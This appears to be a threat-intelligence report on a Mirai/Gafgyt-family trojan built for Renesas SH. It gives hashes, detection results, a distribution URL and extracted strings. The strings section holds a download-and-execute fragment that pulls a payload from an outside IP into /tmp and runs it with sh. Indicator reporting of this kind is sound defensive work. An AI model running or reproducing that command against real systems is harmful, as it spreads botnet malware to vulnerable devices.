db0fa4b8db0333367e9bda3ab68b8042.sh4

First submission 2024-10-14 20:20:02

File details

File type: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Mime type: application/x-executable
File size: 74.99 KB (76788 bytes)
MD5: 0e80a151b68990a32724ad69ca8d3158
SHA1: 1f8c18500d6f837405052a168b6689499586e367
SHA256: 339a1b54635b77d2f7f8cf40c44c5e9ecea4c2c53d6c78edc90d2c64b5d08739

File features detected

Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR

OSINT Enrichments

Virus Total: 43/77 VT report date: 2024-10-13 15:35:10
Malware Type 1 trojan
Threat Type 3 mirai gafgyt smmr1

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://83.233.102.197/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 VirusTotal Report 83.233.102.197 VirusTotal Report 2024-10-14 20:20:02

Strings analysis - Possible IPs found 2

92.249.48.84
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
http://92.249.48.84/bin+-O+/tmp/gaf;sh+/tmp/gaf